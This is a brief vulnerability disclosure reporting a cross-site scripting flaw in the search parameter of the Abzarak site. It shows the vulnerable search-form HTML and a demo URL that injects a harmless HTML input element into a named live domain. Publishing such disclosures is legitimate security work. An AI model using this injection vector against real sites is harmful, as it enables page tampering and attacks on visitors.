Abzarak suffers from a cross site scripting vulnerability.
5e9f49bf21e34f9a25a8f605c394fbff5a6bb658c36fe0720f312aaa455a782f
***************************************************
Abzarak XSS Vulnerability
***************************************************
Author:Mohammad Javanbakht
Email:secanar[at]gmail.com
blog:secanar.blogspot.com
***************************************************
Exploit:
[site]/?s= [html code]->(Decode ACSII to Hex)
Vulnerable code:
<!--BEGIN #searchform-->
<form class="searchform" method="get" action="http://site">
<input class="search" name="s" type="text" tabindex="1" />
<button name="s-btn" class="search-btn" type="submit" tabindex="2">Search</button>
<!--END #searchform-->
</form>
***************************************************
***************************************************
Demo:
http://www.abzarak.com/?s=%3Cinput+value%3D%22XSS%22%3E%3C%2Finput%3E
***************************************************
END